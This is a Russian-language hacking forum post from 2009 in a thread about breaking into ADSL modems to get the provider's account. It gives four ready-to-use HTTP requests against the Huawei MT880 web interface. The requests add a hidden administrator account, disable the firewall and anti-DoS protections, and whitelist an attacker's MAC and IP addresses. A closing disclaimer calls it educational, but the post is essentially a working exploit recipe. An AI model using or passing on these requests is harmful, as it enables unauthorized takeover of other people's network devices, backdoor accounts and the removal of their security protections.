Тема: Взлом Adsl-модемов (достаём учётку прова)
Показать сообщение отдельно

Взлом MT880
  #4  
Старый 05.08.2009, 23:41
t0wer
Новичок
Регистрация: 07.02.2008
Сообщений: 13
Провел на форуме:
23254

Репутация: 5
Lightbulb Взлом MT880
Сейчас во многих областях России (да и за пределами) частенько используют подключение пользователей через телефонную линию при помощи АДСЛ соединений. Для этого всего лишь нужно: провайдер, использующий данную технологию (например: Телеком, Домолинк); телефон дома (естественно подключенный к ГТС и работающий) и ADSL модем (например: D-Link, Zuxel, Huawei и т.д.). Предположим что мы подключились.... Теперь перейдем от общего к частному! На текущий момент нас больше интересует ADSL модем фирмы Huawei марки MT880. У данного модема встроенная конфигурация имеет недостатки, которые позволяют пользователям LAN получать несанкционированный полный доступ к устройству. Наши действия следующие:

1) Добавление прав администратора:
Код:
_http://192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
2) Блокируются firewall/anti-DoS... характеристики:
Код:
_http://192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status
=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
3) Добавляем MAC address в whitelist:
Код:
_http://192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insr
cmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrc
mac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=00000000000
0&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72
=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=
1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inbl
ocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=00000
0000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insr
cmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrc
mac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104
4) Добавляем IP address чтобы пропускал файервол:
Код:
_http://192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Вуаля!

P.S. Данная статья предоставлена в общеобразовательных целях и автор не несет за использование этих материалов никакой ответственности.